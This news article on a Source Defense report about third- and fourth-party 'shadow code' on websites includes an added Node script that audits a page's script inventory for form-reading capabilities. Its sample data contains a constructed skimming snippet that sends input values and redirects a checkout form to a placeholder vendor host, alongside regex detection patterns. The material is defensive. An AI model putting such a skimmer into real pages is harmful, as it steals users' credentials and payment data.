A new report from web application protection specialist Source Defense highlights the risk presented by third- and fourth-party code running on corporate websites.
The digital supply chain means that highly dynamic and unpredictable scripts from third parties, and from parties further removed still, permeate every aspect of a business's web presence. This "shadow code" runs in visitors' browsers with the same access to the page as the site's own scripts, and it has been behind high-profile breaches including the British Airways hack in 2018.
The report shows an average of 15 externally generated scripts per site, with an average of 12 scripts on sensitive pages (those handling logins, account details or payments). Financial services is the most exposed sector, with nearly 60 percent more scripts on sensitive pages than the cross-sector average, double the number of scripts per page overall, and triple the number of fourth-party scripts.
Extensive libraries of third-party scripts are available free or at low cost from a range of sources, and they are popular because they let development teams add advanced functionality quickly without having to build and maintain it themselves. However, these scripts also often load code from additional parties further removed from the deploying organization: fourth-party code that the site operator never selected and may not know is running.
The report finds that 49 percent of sites analyzed had external code present with the ability to retrieve form input and "listen" to user button clicks, and more than one in five sites had external code with the ability to modify forms. Because such code runs inside the page, it can read a credential or card number as it is typed, before the data is ever sent to the site's own servers, and the site's TLS offers no protection against it.
On average, one in four of all scripts contained fourth-party code, as did one in five scripts on individual pages. Sensitive pages fared worse, averaging 12 external scripts in contact with everything from credentials to account and financial details.
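As an added example, not code from the Source Defense report or its authors, the following Node script shows the kind of audit the figures in the preceding three paragraphs imply: it labels each script on a page as first-, third- or fourth-party from its origin and from which script injected it, and flags external scripts whose source contains patterns that read form input, listen for user events or rewrite forms. Every domain, URL and script body in the inventory is constructed for illustration, and the capability checks are simple text heuristics, not the report's methodology.

```javascript
// Added example, not code from the Source Defense report: audit a page's
// script inventory for third- and fourth-party code and flag external scripts
// whose source can touch form data. Runs in Node on a constructed inventory.

// A script is first-party when served from the site's own domain or a
// subdomain of it. Assumption: the operator knows which domains are theirs;
// a CDN under another domain is still third-party.
function isFirstPartyHost(hostname, siteDomain) {
  return hostname === siteDomain || hostname.endsWith('.' + siteDomain);
}

// `loadedBy` is the src of the script that injected this one (null when the
// page's own HTML references it). Fourth-party = an external script pulled in
// by another external script, i.e. code the site operator never chose.
function classifyScript(script, siteDomain, pageUrl) {
  const host = new URL(script.src, pageUrl).hostname;
  if (isFirstPartyHost(host, siteDomain)) return 'first-party';
  if (script.loadedBy) {
    const loaderHost = new URL(script.loadedBy, pageUrl).hostname;
    if (!isFirstPartyHost(loaderHost, siteDomain)) return 'fourth-party';
  }
  return 'third-party';
}

// Static heuristics for the capabilities the report counts. They inspect
// source text only, so they catch straightforward cases and miss obfuscated
// code; treat a hit as "review this vendor", not as proof of exfiltration.
const CAPABILITY_PATTERNS = {
  readsFormInput: /\.value\b|new FormData\(|\.elements\b/,
  listensUserEvents: /addEventListener\(\s*['"](click|submit|input|change|keyup|keydown)['"]/,
  modifiesForms: /\.action\s*=|setAttribute\(\s*['"]action['"]|\.innerHTML\s*=|insertAdjacentHTML\(/,
};

function detectCapabilities(source) {
  return Object.keys(CAPABILITY_PATTERNS).filter((cap) => CAPABILITY_PATTERNS[cap].test(source));
}

// Audit a whole inventory: count scripts per party and list every external
// script that has at least one sensitive capability.
function auditInventory(inventory, siteDomain, pageUrl) {
  const counts = { 'first-party': 0, 'third-party': 0, 'fourth-party': 0 };
  const flagged = [];
  for (const script of inventory) {
    const party = classifyScript(script, siteDomain, pageUrl);
    counts[party] += 1;
    const capabilities = detectCapabilities(script.source);
    if (party !== 'first-party' && capabilities.length > 0) {
      flagged.push({ src: script.src, party, capabilities });
    }
  }
  return { counts, external: counts['third-party'] + counts['fourth-party'], flagged };
}

// Constructed inventory for a fictitious checkout page. In a browser this would
// come from document.scripts plus a MutationObserver recording which script
// was executing when a new <script> element appeared.
const SITE_DOMAIN = 'shop.example';
const PAGE_URL = 'https://www.shop.example/checkout';
const SAMPLE_INVENTORY = [
  { src: 'https://static.shop.example/checkout.js', loadedBy: null,
    source: "document.getElementById('pay').addEventListener('click', () => submit(form.card.value));" },
  { src: 'https://cdn.analytics.example/tag.js', loadedBy: null,
    source: "document.addEventListener('click', e => beacon(e.target.id));" },
  { src: 'https://tags.tagmanager.example/gtm.js', loadedBy: null,
    source: "var s=document.createElement('script');s.src='https://widget.chatvendor.example/w.js';document.head.appendChild(s);" },
  { src: 'https://widget.chatvendor.example/w.js', loadedBy: 'https://tags.tagmanager.example/gtm.js',
    source: "document.querySelectorAll('input').forEach(i => i.addEventListener('input', () => send(i.value)));document.forms[0].action='https://widget.chatvendor.example/collect';" },
  { src: 'https://cdn.jslib.example/lib.min.js', loadedBy: null,
    source: "function debounce(f,t){var h;return function(){clearTimeout(h);h=setTimeout(f,t);};}" },
];

// Print the audit: 1 first-party, 3 third-party, 1 fourth-party; the analytics
// tag and the fourth-party chat widget are flagged.
console.log(JSON.stringify(auditInventory(SAMPLE_INVENTORY, SITE_DOMAIN, PAGE_URL), null, 2));
```

The tag manager in the sample is not flagged itself, yet it is the reason a fourth-party widget with all three capabilities ends up on the checkout page, which is exactly the blind spot the report describes. A Content-Security-Policy script-src allowlist limits which origins such chains can load from, and Subresource Integrity hashes detect a pinned script changing, but neither helps against a vendor whose script is allowed and legitimately dynamic; for those, an inventory like this one has to be re-run as the page changes.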
The full report is available from the Source Defense site.